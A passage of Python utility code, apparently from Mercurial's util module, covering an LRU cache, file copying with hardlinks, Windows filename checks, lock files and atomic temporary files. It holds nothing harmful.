1471 1471 node.next.prev = node.prev
1472 1472 # N.prev = E
1473 1473 node.prev = head.prev
1474 1474 # N.next = A
1475 1475 # It is tempting to do just "head" here, however if node is
1476 1476 # adjacent to head, this will do bad things.
1477 1477 node.next = head.prev.next
1478 1478 # E.next = N
1479 1479 node.next.prev = node
1480 1480 # A.prev = N
1481 1481 node.prev.next = node
1482 1482
1483 1483 self._head = node
1484 1484
1485 1485 def _addcapacity(self):
1486 1486 """Add a node to the circular linked list.
1487 1487
1488 1488 The new node is inserted before the head node.
1489 1489 """
1490 1490 head = self._head
1491 1491 node = _lrucachenode()
1492 1492 head.prev.next = node
1493 1493 node.prev = head.prev
1494 1494 node.next = head
1495 1495 head.prev = node
1496 1496 self._size += 1
1497 1497 return node
1498 1498
1499 1499 def _enforcecostlimit(self):
1500 1500 # This should run after an insertion. It should only be called if total
1501 1501 # cost limits are being enforced.
1502 1502 # The most recently inserted node is never evicted.
1503 1503 if len(self) <= 1 or self.totalcost <= self.maxcost:
1504 1504 return
1505 1505
1506 1506 # This is logically equivalent to calling popoldest() until we
1507 1507 # free up enough cost. We don't do that since popoldest() needs
1508 1508 # to walk the linked list and doing this in a loop would be
1509 1509 # quadratic. So we find the first non-empty node and then
1510 1510 # walk nodes until we free up enough capacity.
1511 1511 #
1512 1512 # If we only removed the minimum number of nodes to free enough
1513 1513 # cost at insert time, chances are high that the next insert would
1514 1514 # also require pruning. This would effectively constitute quadratic
1515 1515 # behavior for insert-heavy workloads. To mitigate this, we set a
1516 1516 # target cost that is a percentage of the max cost. This will tend
1517 1517 # to free more nodes when the high water mark is reached, which
1518 1518 # lowers the chances of needing to prune on the subsequent insert.
1519 1519 targetcost = int(self.maxcost * 0.75)
1520 1520
1521 1521 n = self._head.prev
1522 1522 while n.key is _notset:
1523 1523 n = n.prev
1524 1524
1525 1525 while len(self) > 1 and self.totalcost > targetcost:
1526 1526 del self._cache[n.key]
1527 1527 self.totalcost -= n.cost
1528 1528 n.markempty()
1529 1529 n = n.prev
1530 1530
1531 1531 def lrucachefunc(func):
1532 1532 '''cache most recent results of function calls'''
1533 1533 cache = {}
1534 1534 order = collections.deque()
1535 1535 if func.__code__.co_argcount == 1:
1536 1536 def f(arg):
1537 1537 if arg not in cache:
1538 1538 if len(cache) > 20:
1539 1539 del cache[order.popleft()]
1540 1540 cache[arg] = func(arg)
1541 1541 else:
1542 1542 order.remove(arg)
1543 1543 order.append(arg)
1544 1544 return cache[arg]
1545 1545 else:
1546 1546 def f(*args):
1547 1547 if args not in cache:
1548 1548 if len(cache) > 20:
1549 1549 del cache[order.popleft()]
1550 1550 cache[args] = func(*args)
1551 1551 else:
1552 1552 order.remove(args)
1553 1553 order.append(args)
1554 1554 return cache[args]
1555 1555
1556 1556 return f
1557 1557
1558 1558 class propertycache(object):
1559 1559 def __init__(self, func):
1560 1560 self.func = func
1561 1561 self.name = func.__name__
1562 1562 def __get__(self, obj, type=None):
1563 1563 result = self.func(obj)
1564 1564 self.cachevalue(obj, result)
1565 1565 return result
1566 1566
1567 1567 def cachevalue(self, obj, value):
1568 1568 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1569 1569 obj.__dict__[self.name] = value
1570 1570
1571 1571 def clearcachedproperty(obj, prop):
1572 1572 '''clear a cached property value, if one has been set'''
1573 1573 prop = pycompat.sysstr(prop)
1574 1574 if prop in obj.__dict__:
1575 1575 del obj.__dict__[prop]
1576 1576
1577 1577 def increasingchunks(source, min=1024, max=65536):
1578 1578 '''return no less than min bytes per chunk while data remains,
1579 1579 doubling min after each chunk until it reaches max'''
1580 1580 def log2(x):
1581 1581 if not x:
1582 1582 return 0
1583 1583 i = 0
1584 1584 while x:
1585 1585 x >>= 1
1586 1586 i += 1
1587 1587 return i - 1
1588 1588
1589 1589 buf = []
1590 1590 blen = 0
1591 1591 for chunk in source:
1592 1592 buf.append(chunk)
1593 1593 blen += len(chunk)
1594 1594 if blen >= min:
1595 1595 if min < max:
1596 1596 min = min << 1
1597 1597 nmin = 1 << log2(blen)
1598 1598 if nmin > min:
1599 1599 min = nmin
1600 1600 if min > max:
1601 1601 min = max
1602 1602 yield ''.join(buf)
1603 1603 blen = 0
1604 1604 buf = []
1605 1605 if buf:
1606 1606 yield ''.join(buf)
1607 1607
1608 1608 def always(fn):
1609 1609 return True
1610 1610
1611 1611 def never(fn):
1612 1612 return False
1613 1613
1614 1614 def nogc(func):
1615 1615 """disable garbage collector
1616 1616
1617 1617 Python's garbage collector triggers a GC each time a certain number of
1618 1618 container objects (the number being defined by gc.get_threshold()) are
1619 1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 1621 into. As a workaround, disable GC while building complex (huge)
1622 1622 containers.
1623 1623
1624 1624 This garbage collector issue have been fixed in 2.7. But it still affect
1625 1625 CPython's performance.
1626 1626 """
1627 1627 def wrapper(*args, **kwargs):
1628 1628 gcenabled = gc.isenabled()
1629 1629 gc.disable()
1630 1630 try:
1631 1631 return func(*args, **kwargs)
1632 1632 finally:
1633 1633 if gcenabled:
1634 1634 gc.enable()
1635 1635 return wrapper
1636 1636
1637 1637 if pycompat.ispypy:
1638 1638 # PyPy runs slower with gc disabled
1639 1639 nogc = lambda x: x
1640 1640
1641 1641 def pathto(root, n1, n2):
1642 1642 '''return the relative path from one place to another.
1643 1643 root should use os.sep to separate directories
1644 1644 n1 should use os.sep to separate directories
1645 1645 n2 should use "/" to separate directories
1646 1646 returns an os.sep-separated path.
1647 1647
1648 1648 If n1 is a relative path, it's assumed it's
1649 1649 relative to root.
1650 1650 n2 should always be relative to root.
1651 1651 '''
1652 1652 if not n1:
1653 1653 return localpath(n2)
1654 1654 if os.path.isabs(n1):
1655 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1656 return os.path.join(root, localpath(n2))
1657 1657 n2 = '/'.join((pconvert(root), n2))
1658 1658 a, b = splitpath(n1), n2.split('/')
1659 1659 a.reverse()
1660 1660 b.reverse()
1661 1661 while a and b and a[-1] == b[-1]:
1662 1662 a.pop()
1663 1663 b.pop()
1664 1664 b.reverse()
1665 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
1667 1667 # the location of data files matching the source code
1668 1668 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1669 1669 # executable version (py2exe) doesn't support __file__
1670 1670 datapath = os.path.dirname(pycompat.sysexecutable)
1671 1671 else:
1672 1672 datapath = os.path.dirname(pycompat.fsencode(__file__))
1673 1673
1674 1674 i18n.setdatapath(datapath)
1675 1675
1676 1676 def checksignature(func):
1677 1677 '''wrap a function with code to check for calling errors'''
1678 1678 def check(*args, **kwargs):
1679 1679 try:
1680 1680 return func(*args, **kwargs)
1681 1681 except TypeError:
1682 1682 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1683 1683 raise error.SignatureError
1684 1684 raise
1685 1685
1686 1686 return check
1687 1687
1688 1688 # a whilelist of known filesystems where hardlink works reliably
1689 1689 _hardlinkfswhitelist = {
1690 1690 'apfs',
1691 1691 'btrfs',
1692 1692 'ext2',
1693 1693 'ext3',
1694 1694 'ext4',
1695 1695 'hfs',
1696 1696 'jfs',
1697 1697 'NTFS',
1698 1698 'reiserfs',
1699 1699 'tmpfs',
1700 1700 'ufs',
1701 1701 'xfs',
1702 1702 'zfs',
1703 1703 }
1704 1704
1705 1705 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1706 1706 '''copy a file, preserving mode and optionally other stat info like
1707 1707 atime/mtime
1708 1708
1709 1709 checkambig argument is used with filestat, and is useful only if
1710 1710 destination file is guarded by any lock (e.g. repo.lock or
1711 1711 repo.wlock).
1712 1712
1713 1713 copystat and checkambig should be exclusive.
1714 1714 '''
1715 1715 assert not (copystat and checkambig)
1716 1716 oldstat = None
1717 1717 if os.path.lexists(dest):
1718 1718 if checkambig:
1719 1719 oldstat = checkambig and filestat.frompath(dest)
1720 1720 unlink(dest)
1721 1721 if hardlink:
1722 1722 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1723 1723 # unless we are confident that dest is on a whitelisted filesystem.
1724 1724 try:
1725 1725 fstype = getfstype(os.path.dirname(dest))
1726 1726 except OSError:
1727 1727 fstype = None
1728 1728 if fstype not in _hardlinkfswhitelist:
1729 1729 hardlink = False
1730 1730 if hardlink:
1731 1731 try:
1732 1732 oslink(src, dest)
1733 1733 return
1734 1734 except (IOError, OSError):
1735 1735 pass # fall back to normal copy
1736 1736 if os.path.islink(src):
1737 1737 os.symlink(os.readlink(src), dest)
1738 1738 # copytime is ignored for symlinks, but in general copytime isn't needed
1739 1739 # for them anyway
1740 1740 else:
1741 1741 try:
1742 1742 shutil.copyfile(src, dest)
1743 1743 if copystat:
1744 1744 # copystat also copies mode
1745 1745 shutil.copystat(src, dest)
1746 1746 else:
1747 1747 shutil.copymode(src, dest)
1748 1748 if oldstat and oldstat.stat:
1749 1749 newstat = filestat.frompath(dest)
1750 1750 if newstat.isambig(oldstat):
1751 1751 # stat of copied file is ambiguous to original one
1752 1752 advanced = (
1753 1753 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1754 1754 os.utime(dest, (advanced, advanced))
1755 1755 except shutil.Error as inst:
1756 1756 raise error.Abort(str(inst))
1757 1757
1758 1758 def copyfiles(src, dst, hardlink=None, progress=None):
1759 1759 """Copy a directory tree using hardlinks if possible."""
1760 1760 num = 0
1761 1761
1762 1762 def settopic():
1763 1763 if progress:
1764 1764 progress.topic = _('linking') if hardlink else _('copying')
1765 1765
1766 1766 if os.path.isdir(src):
1767 1767 if hardlink is None:
1768 1768 hardlink = (os.stat(src).st_dev ==
1769 1769 os.stat(os.path.dirname(dst)).st_dev)
1770 1770 settopic()
1771 1771 os.mkdir(dst)
1772 1772 for name, kind in listdir(src):
1773 1773 srcname = os.path.join(src, name)
1774 1774 dstname = os.path.join(dst, name)
1775 1775 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1776 1776 num += n
1777 1777 else:
1778 1778 if hardlink is None:
1779 1779 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1780 1780 os.stat(os.path.dirname(dst)).st_dev)
1781 1781 settopic()
1782 1782
1783 1783 if hardlink:
1784 1784 try:
1785 1785 oslink(src, dst)
1786 1786 except (IOError, OSError):
1787 1787 hardlink = False
1788 1788 shutil.copy(src, dst)
1789 1789 else:
1790 1790 shutil.copy(src, dst)
1791 1791 num += 1
1792 1792 if progress:
1793 1793 progress.increment()
1794 1794
1795 1795 return hardlink, num
1796 1796
1797 1797 _winreservednames = {
1798 1798 'con', 'prn', 'aux', 'nul',
1799 1799 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1800 1800 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1801 1801 }
1802 1802 _winreservedchars = ':*?"<>|'
1803 1803 def checkwinfilename(path):
1804 1804 r'''Check that the base-relative path is a valid filename on Windows.
1805 1805 Returns None if the path is ok, or a UI string describing the problem.
1806 1806
1807 1807 >>> checkwinfilename(b"just/a/normal/path")
1808 1808 >>> checkwinfilename(b"foo/bar/con.xml")
1809 1809 "filename contains 'con', which is reserved on Windows"
1810 1810 >>> checkwinfilename(b"foo/con.xml/bar")
1811 1811 "filename contains 'con', which is reserved on Windows"
1812 1812 >>> checkwinfilename(b"foo/bar/xml.con")
1813 1813 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1814 1814 "filename contains 'AUX', which is reserved on Windows"
1815 1815 >>> checkwinfilename(b"foo/bar/bla:.txt")
1816 1816 "filename contains ':', which is reserved on Windows"
1817 1817 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1818 1818 "filename contains '\\x07', which is invalid on Windows"
1819 1819 >>> checkwinfilename(b"foo/bar/bla ")
1820 1820 "filename ends with ' ', which is not allowed on Windows"
1821 1821 >>> checkwinfilename(b"../bar")
1822 1822 >>> checkwinfilename(b"foo\\")
1823 1823 "filename ends with '\\', which is invalid on Windows"
1824 1824 >>> checkwinfilename(b"foo\\/bar")
1825 1825 "directory name ends with '\\', which is invalid on Windows"
1826 1826 '''
1827 1827 if path.endswith('\\'):
1828 1828 return _("filename ends with '\\', which is invalid on Windows")
1829 1829 if '\\/' in path:
1830 1830 return _("directory name ends with '\\', which is invalid on Windows")
1831 1831 for n in path.replace('\\', '/').split('/'):
1832 1832 if not n:
1833 1833 continue
1834 1834 for c in _filenamebytestr(n):
1835 1835 if c in _winreservedchars:
1836 1836 return _("filename contains '%s', which is reserved "
1837 1837 "on Windows") % c
1838 1838 if ord(c) <= 31:
1839 1839 return _("filename contains '%s', which is invalid "
1840 1840 "on Windows") % stringutil.escapestr(c)
1841 1841 base = n.split('.')[0]
1842 1842 if base and base.lower() in _winreservednames:
1843 1843 return _("filename contains '%s', which is reserved "
1844 1844 "on Windows") % base
1845 1845 t = n[-1:]
1846 1846 if t in '. ' and n not in '..':
1847 1847 return _("filename ends with '%s', which is not allowed "
1848 1848 "on Windows") % t
1849 1849
1850 1850 if pycompat.iswindows:
1851 1851 checkosfilename = checkwinfilename
1852 1852 timer = time.clock
1853 1853 else:
1854 1854 checkosfilename = platform.checkosfilename
1855 1855 timer = time.time
1856 1856
1857 1857 if safehasattr(time, "perf_counter"):
1858 1858 timer = time.perf_counter
1859 1859
1860 1860 def makelock(info, pathname):
1861 1861 """Create a lock file atomically if possible
1862 1862
1863 1863 This may leave a stale lock file if symlink isn't supported and signal
1864 1864 interrupt is enabled.
1865 1865 """
1866 1866 try:
1867 1867 return os.symlink(info, pathname)
1868 1868 except OSError as why:
1869 1869 if why.errno == errno.EEXIST:
1870 1870 raise
1871 1871 except AttributeError: # no symlink in os
1872 1872 pass
1873 1873
1874 1874 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1875 1875 ld = os.open(pathname, flags)
1876 1876 os.write(ld, info)
1877 1877 os.close(ld)
1878 1878
1879 1879 def readlock(pathname):
1880 1880 try:
1881 1881 return readlink(pathname)
1882 1882 except OSError as why:
1883 1883 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1884 1884 raise
1885 1885 except AttributeError: # no symlink in os
1886 1886 pass
1887 1887 with posixfile(pathname, 'rb') as fp:
1888 1888 return fp.read()
1889 1889
1890 1890 def fstat(fp):
1891 1891 '''stat file object that may not have fileno method.'''
1892 1892 try:
1893 1893 return os.fstat(fp.fileno())
1894 1894 except AttributeError:
1895 1895 return os.stat(fp.name)
1896 1896
1897 1897 # File system features
1898 1898
1899 1899 def fscasesensitive(path):
1900 1900 """
1901 1901 Return true if the given path is on a case-sensitive filesystem
1902 1902
1903 1903 Requires a path (like /foo/.hg) ending with a foldable final
1904 1904 directory component.
1905 1905 """
1906 1906 s1 = os.lstat(path)
1907 1907 d, b = os.path.split(path)
1908 1908 b2 = b.upper()
1909 1909 if b == b2:
1910 1910 b2 = b.lower()
1911 1911 if b == b2:
1912 1912 return True # no evidence against case sensitivity
1913 1913 p2 = os.path.join(d, b2)
1914 1914 try:
1915 1915 s2 = os.lstat(p2)
1916 1916 if s2 == s1:
1917 1917 return False
1918 1918 return True
1919 1919 except OSError:
1920 1920 return True
1921 1921
1922 1922 try:
1923 1923 import re2
1924 1924 _re2 = None
1925 1925 except ImportError:
1926 1926 _re2 = False
1927 1927
1928 1928 class _re(object):
1929 1929 def _checkre2(self):
1930 1930 global _re2
1931 1931 try:
1932 1932 # check if match works, see issue3964
1933 1933 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1934 1934 except ImportError:
1935 1935 _re2 = False
1936 1936
1937 1937 def compile(self, pat, flags=0):
1938 1938 '''Compile a regular expression, using re2 if possible
1939 1939
1940 1940 For best performance, use only re2-compatible regexp features. The
1941 1941 only flags from the re module that are re2-compatible are
1942 1942 IGNORECASE and MULTILINE.'''
1943 1943 if _re2 is None:
1944 1944 self._checkre2()
1945 1945 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1946 1946 if flags & remod.IGNORECASE:
1947 1947 pat = '(?i)' + pat
1948 1948 if flags & remod.MULTILINE:
1949 1949 pat = '(?m)' + pat
1950 1950 try:
1951 1951 return re2.compile(pat)
1952 1952 except re2.error:
1953 1953 pass
1954 1954 return remod.compile(pat, flags)
1955 1955
1956 1956 @propertycache
1957 1957 def escape(self):
1958 1958 '''Return the version of escape corresponding to self.compile.
1959 1959
1960 1960 This is imperfect because whether re2 or re is used for a particular
1961 1961 function depends on the flags, etc, but it's the best we can do.
1962 1962 '''
1963 1963 global _re2
1964 1964 if _re2 is None:
1965 1965 self._checkre2()
1966 1966 if _re2:
1967 1967 return re2.escape
1968 1968 else:
1969 1969 return remod.escape
1970 1970
1971 1971 re = _re()
1972 1972
1973 1973 _fspathcache = {}
1974 1974 def fspath(name, root):
1975 1975 '''Get name in the case stored in the filesystem
1976 1976
1977 1977 The name should be relative to root, and be normcase-ed for efficiency.
1978 1978
1979 1979 Note that this function is unnecessary, and should not be
1980 1980 called, for case-sensitive filesystems (simply because it's expensive).
1981 1981
1982 1982 The root should be normcase-ed, too.
1983 1983 '''
1984 1984 def _makefspathcacheentry(dir):
1985 1985 return dict((normcase(n), n) for n in os.listdir(dir))
1986 1986
1987 1987 seps = pycompat.ossep
1988 1988 if pycompat.osaltsep:
1989 1989 seps = seps + pycompat.osaltsep
1990 1990 # Protect backslashes. This gets silly very quickly.
1991 1991 seps.replace('\\','\\\\')
1992 1992 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1993 1993 dir = os.path.normpath(root)
1994 1994 result = []
1995 1995 for part, sep in pattern.findall(name):
1996 1996 if sep:
1997 1997 result.append(sep)
1998 1998 continue
1999 1999
2000 2000 if dir not in _fspathcache:
2001 2001 _fspathcache[dir] = _makefspathcacheentry(dir)
2002 2002 contents = _fspathcache[dir]
2003 2003
2004 2004 found = contents.get(part)
2005 2005 if not found:
2006 2006 # retry "once per directory" per "dirstate.walk" which
2007 2007 # may take place for each patches of "hg qpush", for example
2008 2008 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2009 2009 found = contents.get(part)
2010 2010
2011 2011 result.append(found or part)
2012 2012 dir = os.path.join(dir, part)
2013 2013
2014 2014 return ''.join(result)
2015 2015
2016 2016 def checknlink(testfile):
2017 2017 '''check whether hardlink count reporting works properly'''
2018 2018
2019 2019 # testfile may be open, so we need a separate file for checking to
2020 2020 # work around issue2543 (or testfile may get lost on Samba shares)
2021 2021 f1, f2, fp = None, None, None
2022 2022 try:
2023 2023 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2024 2024 suffix='1~', dir=os.path.dirname(testfile))
2025 2025 os.close(fd)
2026 2026 f2 = '%s2~' % f1[:-2]
2027 2027
2028 2028 oslink(f1, f2)
2029 2029 # nlinks() may behave differently for files on Windows shares if
2030 2030 # the file is open.
2031 2031 fp = posixfile(f2)
2032 2032 return nlinks(f2) > 1
2033 2033 except OSError:
2034 2034 return False
2035 2035 finally:
2036 2036 if fp is not None:
2037 2037 fp.close()
2038 2038 for f in (f1, f2):
2039 2039 try:
2040 2040 if f is not None:
2041 2041 os.unlink(f)
2042 2042 except OSError:
2043 2043 pass
2044 2044
2045 2045 def endswithsep(path):
2046 2046 '''Check path ends with os.sep or os.altsep.'''
2047 2047 return (path.endswith(pycompat.ossep)
2048 2048 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2049 2049
2050 2050 def splitpath(path):
2051 2051 '''Split path by os.sep.
2052 2052 Note that this function does not use os.altsep because this is
2053 2053 an alternative of simple "xxx.split(os.sep)".
2054 2054 It is recommended to use os.path.normpath() before using this
2055 2055 function if need.'''
2056 2056 return path.split(pycompat.ossep)
2057 2057
2058 2058 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2059 2059 """Create a temporary file with the same contents from name
2060 2060
2061 2061 The permission bits are copied from the original file.
2062 2062
2063 2063 If the temporary file is going to be truncated immediately, you
2064 2064 can use emptyok=True as an optimization.
2065 2065
2066 2066 Returns the name of the temporary file.
2067 2067 """
2068 2068 d, fn = os.path.split(name)
2069 2069 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2070 2070 os.close(fd)
2071 2071 # Temporary files are created with mode 0600, which is usually not
2072 2072 # what we want. If the original file already exists, just copy
2073 2073 # its mode. Otherwise, manually obey umask.
2074 2074 copymode(name, temp, createmode, enforcewritable)
2075 2075
2076 2076 if emptyok:
2077 2077 return temp
2078 2078 try:
2079 2079 try:
2080 2080 ifp = posixfile(name, "rb")
2081 2081 except IOError as inst:
2082 2082 if inst.errno == errno.ENOENT:
2083 2083 return temp
2084 2084 if not getattr(inst, 'filename', None):
2085 2085 inst.filename = name
2086 2086 raise
2087 2087 ofp = posixfile(temp, "wb")
2088 2088 for chunk in filechunkiter(ifp):
2089 2089 ofp.write(chunk)
2090 2090 ifp.close()
2091 2091 ofp.close()
2092 2092 except: # re-raises
2093 2093 try:
2094 2094 os.unlink(temp)
2095 2095 except OSError:
2096 2096 pass
2097 2097 raise
2098 2098 return temp
2099 2099
2100 2100 class filestat(object):
2101 2101 """help to exactly detect change of a file
2102 2102
2103 2103 'stat' attribute is result of 'os.stat()' if specified 'path'
2104 2104 exists. Otherwise, it is None. This can avoid preparative
2105 2105 'exists()' examination on client side of this class.
2106 2106 """
2107 2107 def __init__(self, stat):
2108 2108 self.stat = stat
2109 2109
2110 2110 @classmethod
2111 2111 def frompath(cls, path):
2112 2112 try:
2113 2113 stat = os.stat(path)
2114 2114 except OSError as err:
2115 2115 if err.errno != errno.ENOENT:
2116 2116 raise
2117 2117 stat = None
2118 2118 return cls(stat)
2119 2119
2120 2120 @classmethod
2121 2121 def fromfp(cls, fp):
2122 2122 stat = os.fstat(fp.fileno())
2123 2123 return cls(stat)
2124 2124
2125 2125 __hash__ = object.__hash__
2126 2126
2127 2127 def __eq__(self, old):
2128 2128 try:
2129 2129 # if ambiguity between stat of new and old file is
2130 2130 # avoided, comparison of size, ctime and mtime is enough
2131 2131 # to exactly detect change of a file regardless of platform
2132 2132 return (self.stat.st_size == old.stat.st_size and
2133 2133 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2134 2134 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2135 2135 except AttributeError:
2136 2136 pass
2137 2137 try:
2138 2138 return self.stat is None and old.stat is None
2139 2139 except AttributeError:
2140 2140 return False
2141 2141
2142 2142 def isambig(self, old):
2143 2143 """Examine whether new (= self) stat is ambiguous against old one
2144 2144
2145 2145 "S[N]" below means stat of a file at N-th change:
2146 2146
2147 2147 - S[n-1].ctime < S[n].ctime: can detect change of a file
2148 2148 - S[n-1].ctime == S[n].ctime
2149 2149 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2150 2150 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2151 2151 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2152 2152 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2153 2153
2154 2154 Case (*2) above means that a file was changed twice or more at
2155 2155 same time in sec (= S[n-1].ctime), and comparison of timestamp
2156 2156 is ambiguous.
2157 2157
2158 2158 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2159 2159 timestamp is ambiguous".
2160 2160
2161 2161 But advancing mtime only in case (*2) doesn't work as
2162 2162 expected, because naturally advanced S[n].mtime in case (*1)
2163 2163 might be equal to manually advanced S[n-1 or earlier].mtime.
2164 2164
2165 2165 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2166 2166 treated as ambiguous regardless of mtime, to avoid overlooking
2167 2167 by confliction between such mtime.
2168 2168
2169 2169 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2170 2170 S[n].mtime", even if size of a file isn't changed.
2171 2171 """
2172 2172 try:
2173 2173 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2174 2174 except AttributeError:
2175 2175 return False
2176 2176
2177 2177 def avoidambig(self, path, old):
2178 2178 """Change file stat of specified path to avoid ambiguity
2179 2179
2180 2180 'old' should be previous filestat of 'path'.
2181 2181
2182 2182 This skips avoiding ambiguity, if a process doesn't have
2183 2183 appropriate privileges for 'path'. This returns False in this
2184 2184 case.
2185 2185
2186 2186 Otherwise, this returns True, as "ambiguity is avoided".
2187 2187 """
2188 2188 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2189 2189 try:
2190 2190 os.utime(path, (advanced, advanced))
2191 2191 except OSError as inst:
2192 2192 if inst.errno == errno.EPERM:
2193 2193 # utime() on the file created by another user causes EPERM,
2194 2194 # if a process doesn't have appropriate privileges
2195 2195 return False
2196 2196 raise
2197 2197 return True
2198 2198
2199 2199 def __ne__(self, other):
2200 2200 return not self == other
2201 2201
2202 2202 class atomictempfile(object):
2203 2203 '''writable file object that atomically updates a file
2204 2204
2205 2205 All writes will go to a temporary copy of the original file. Call
2206 2206 close() when you are done writing, and atomictempfile will rename
2207 2207 the temporary copy to the original name, making the changes
2208 2208 visible. If the object is destroyed without being closed, all your
2209 2209 writes are discarded.
2210 2210
2211 2211 checkambig argument of constructor is used with filestat, and is
2212 2212 useful only if target file is guarded by any lock (e.g. repo.lock
2213 2213 or repo.wlock).
2214 2214 '''
2215 2215 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2216 2216 self.__name = name # permanent name
2217 2217 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2218 2218 createmode=createmode,
2219 2219 enforcewritable=('w' in mode))
2220 2220
2221 2221 self._fp = posixfile(self._tempname, mode)
2222 2222 self._checkambig = checkambig
2223 2223
2224 2224 # delegated methods
2225 2225 self.read = self._fp.read
2226 2226 self.write = self._fp.write
2227 2227 self.seek = self._fp.seek
2228 2228 self.tell = self._fp.tell
2229 2229 self.fileno = self._fp.fileno
2230 2230
2231 2231 def close(self):
2232 2232 if not self._fp.closed:
2233 2233 self._fp.close()
2234 2234 filename = localpath(self.__name)
2235 2235 oldstat = self._checkambig and filestat.frompath(filename)
2236 2236 if oldstat and oldstat.stat:
2237 2237 rename(self._tempname, filename)
2238 2238 newstat = filestat.frompath(filename)
2239 2239 if newstat.isambig(oldstat):
2240 2240 # stat of changed file is ambiguous to original one
2241 2241 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2242 2242 os.utime(filename, (advanced, advanced))
2243 2243 else:
2244 2244 rename(self._tempname, filename)
2245 2245
2246 2246 def discard(self):
2247 2247 if not self._fp.closed:
2248 2248 try:
2249 2249 os.unlink(self._tempname)
2250 2250 except OSError:
2251 2251 pass
2252 2252 self._fp.close()
2253 2253
2254 2254 def __del__(self):
2255 2255 if safehasattr(self, '_fp'): # constructor actually did something
2256 2256 self.discard()
2257 2257
2258 2258 def __enter__(self):
2259 2259 return self
2260 2260
2261 2261 def __exit__(self, exctype, excvalue, traceback):
2262 2262 if exctype is not None:
2263 2263 self.discard()
2264 2264 else:
2265 2265 self.close()
2266 2266
2267 2267 def unlinkpath(f, ignoremissing=False, rmdir=True):
2268 2268 """unlink and remove the directory if it is empty"""
2269 2269 if ignoremissing:
2270 2270 tryunlink(f)
2271 2271 else:
2272 2272 unlink(f)
2273 2273 if rmdir:
2274 2274 # try removing directories that might now be empty
2275 2275 try:
2276 2276 removedirs(os.path.dirname(f))
2277 2277 except OSError:
2278 2278 pass
2279 2279
2280 2280 def tryunlink(f):
2281 2281 """Attempt to remove a file, ignoring ENOENT errors."""
2282 2282 try:
2283 2283 unlink(f)
2284 2284 except OSError as e:
2285 2285 if e.errno != errno.ENOENT:
2286 2286 raise
2287 2287
2288 2288 def makedirs(name, mode=None, notindexed=False):
2289 2289 """recursive directory creation with parent mode inheritance
2290 2290
2291 2291 Newly created directories are marked as "not to be indexed by
2292 2292 the content indexing service", if ``notindexed`` is specified
2293 2293 for "write" mode access.
2294 2294 """
2295 2295 try:
2296 2296 makedir(name, notindexed)
2297 2297 except OSError as err:
2298 2298 if err.errno == errno.EEXIST:
2299 2299 return
2300 2300 if err.errno != errno.ENOENT or not name:
2301 2301 raise
2302 2302 parent = os.path.dirname(os.path.abspath(name))
2303 2303 if parent == name:
2304 2304 raise
2305 2305 makedirs(parent, mode, notindexed)
2306 2306 try:
2307 2307 makedir(name, notindexed)
2308 2308 except OSError as err:
2309 2309 # Catch EEXIST to handle races
2310 2310 if err.errno == errno.EEXIST:
2311 2311 return
2312 2312 raise
2313 2313 if mode is not None:
2314 2314 os.chmod(name, mode)
2315 2315
2316 2316 def readfile(path):
2317 2317 with open(path, 'rb') as fp:
2318 2318 return fp.read()
2319 2319
2320 2320 def writefile(path, text):
2321 2321 with open(path, 'wb') as fp:
2322 2322 fp.write(text)
2323 2323
2324 2324 def appendfile(path, text):
2325 2325 with open(path, 'ab') as fp:
2326 2326 fp.write(text)
2327 2327
2328 2328 class chunkbuffer(object):
2329 2329 """Allow arbitrary sized chunks of data to be efficiently read from an
2330 2330 iterator over chunks of arbitrary size."""
2331 2331
2332 2332 def __init__(self, in_iter):
2333 2333 """in_iter is the iterator that's iterating over the input chunks."""
2334 2334 def splitbig(chunks):
2335 2335 for chunk in chunks:
2336 2336 if len(chunk) > 2**20:
2337 2337 pos = 0
2338 2338 while pos < len(chunk):
2339 2339 end = pos + 2 ** 18
2340 2340 yield chunk[pos:end]
2341 2341 pos = end
2342 2342 else:
2343 2343 yield chunk
2344 2344 self.iter = splitbig(in_iter)
2345 2345 self._queue = collections.deque()
2346 2346 self._chunkoffset = 0
2347 2347
2348 2348 def read(self, l=None):
